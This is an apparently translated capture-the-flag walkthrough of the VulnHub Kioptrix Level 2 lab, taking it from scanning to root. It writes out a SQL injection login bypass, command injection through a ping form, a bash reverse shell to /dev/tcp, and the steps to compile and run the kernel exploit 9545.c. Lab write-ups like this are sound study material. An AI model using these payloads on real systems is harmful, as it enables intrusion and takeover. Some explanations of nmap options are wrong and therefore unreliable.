Summary and process of penetration test at VulnHub Kioptrix Level 2


Host discovery

Use netdiscover tool to discover intranet hosts.

Netdiscover Introduction: a special layer 2 discovery tool. It has two ways of active and passive discovery.

I use the following command:

netdiscover -i eth0

Command interpretation:

-i: network card,Select the network card you monitor. such as eth0. 

As shown in the figure:

Content after tool execution:

ip192.168.1.104 is the IP of my host, only ip192 168.1.101 is an unknown host, so the target host IP is

Scanning / information gathering

I use nmap to scan the target host to get more information about the target host. The information you scan determines the direction you can try later. It's always good to spend more time collecting information.
I use the following command:

nmap -Pn -sS --stats-every 3m --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 [ip]

nmap tool explanation:

Nmap ("Network Mapper(Network mapper)") Is an open source network detection and security audit tool. Its design goal is to scan large networks quickly. Of course, there is no problem scanning a single host with it. Nmap Use the original in a novel way IP Message to find out which hosts are on the network and what services those hosts provide(Application name and version),What operating system are those services running on(Include version information),What type of message filters do they use/Firewall, and a bunch of other functions. although Nmap It is usually used for security audit. Many system administrators and network administrators also use it to do some daily work, such as viewing the information of the whole network, managing the service upgrade plan, and monitoring the operation of hosts and services.

Command interpretation:

-Pn :  Do not proceed ping scanning
-sS: Specify use TCP SYN To scan the target host
--stats-every 3m: Output every 3 seconds
--max-scan-delay: prevent Nmap Send multiple detection messages to the host at the same time
--defeat-rst-ratelimit: By sending RST Packet to limit the scan rate
-T4: T4 Speed mode
-p: Scanned port

The execution effect of the tool is as follows:

22port: ssh Remote Login port
80port: Hypertext Transfer Protocol open port
111port: RPC service of SUN company
443port: Web browsing port
631port: network printer service
792port: unknown
3306port: default port of MySQL

Secondary scanning

Still use the nmap tool. The command is as follows:

nmap -nvv -Pn -sSV -p [port] --version-intensity 9 -A [ip]

Command interpretation:

-nvv: Scan router 
-Pn: Do not proceed ping scanning
-sSV: The identification result of the system version will be added at the end of the scanning result
-p: Scanned port
--version-intensity: Set version scan intensity
-A: Operating system scan,Script scan,Route tracking,Service detection

The execution effect of the tool is as follows:

I found the public vulnerability of ssh version. Unfortunately, there are no useful vulnerabilities

Let's look at port 80, open the browser and enter the ip address in the address bar

There is only one login box and no other pages
I then started nikto scan, and the command is as follows:

nikto -h [ip] #-h: Abbreviation for - host

Nikto is an open source (GPL) web server scanner, which can comprehensively scan web servers, including more than 3300 potentially dangerous files / CGIs; More than 625 server versions; More than 230 specific server issues. Scanned items and plug-ins can be updated automatically if necessary. Complete its underlying functions based on Whistler / libwhistler. This is a great tool, but the software itself is not updated frequently, and the latest and most dangerous may not be detected.
As shown in the figure:

Unfortunately, there are only a few small vulnerabilities and no other useful vulnerabilities. Next, I use dirbuster to scan the directory of the web page to see what we can find
Enter dirbuster in the terminal to start the tool

DirBuster Is a multithreaded based Java The application is designed for brute force cracking Web Tools for applying directory names and file names on the server.

The dictionary address is:


Start scanning

Click results tree view to browse

Unfortunately, there are no sensitive directories. Let's take a look at login box

In our information collection stage, we found that the target has opened port 3306 (mysql default port), indicating that they have enabled mysql service. I guess there may be sql injection vulnerability in the login box. First, let's try whether the universal password can log in

admin' OR 4=4/*

Successfully logged in. There seems to be a login box inside. It seems to be a web console. It says ping the host on the network. Let's try

I'm going to use the field box with loopback address to add a ";" (command separator)

After success, it will be much simpler. Let's bounce a shell. First, go back to the terminal, start netcat and listen to the port. The command is as follows:
The full name of nc is NetCat, known as the "Swiss Army Knife" in the network security field. nc is a very standard telnet client tool. Because of its powerful functions, it is widely used in intrusion and has become one of the necessary weapons for hackers

nc -nvlp [port]

Then go back to the browser and bounce a shell. The command is as follows:

bash -i >& /dev/tcp/[ip]/[port] 0>&1

Then click

Successful rebound shell

Right raising

Let's take a look at the operating system and kernel version of the target host. The commands are as follows:

cat /etc/*-release #View operating system
uname -mrs #View kernel version

Check whether there are public search engines

good luck! The first is kali's official vulnerability database. Let's click in and have a look

The target operating system has a local privilege escalation vulnerability. We download this module, then enable the Apache 2 service, send the file to the target host, and then compile and run it. The command is as follows:

service apache2 start #Enable apache2 service
cp The directory where you downloaded the files/9545.c var/www/html #Hosting files on a web site
chmod 777 9545.c #Grant file permissions

Then go back to the target shell, find the folder where we have permission to download and run files, and use ls -al to view the folder permissions
As shown in the figure:

We can see that files can be downloaded and run under the / tmp folder. Use cd /tmp to move to the tmp folder, and then download the files. The command is as follows:


Grant file permissions:

chmod 777 9545.c

Compile source file:

gcc 9545.c

Grant permissions to compiled files:

chmod 777 a.out

Then run the file:


Successfully obtained the root permission!


This host also tends to be a novice. You can get root permission without too much knowledge. If you have any problems, you can send me a private letter.

Tags: Linux network Information Security security Cyber Security

Posted by Isomerizer on Thu, 14 Apr 2022 02:15:22 +0930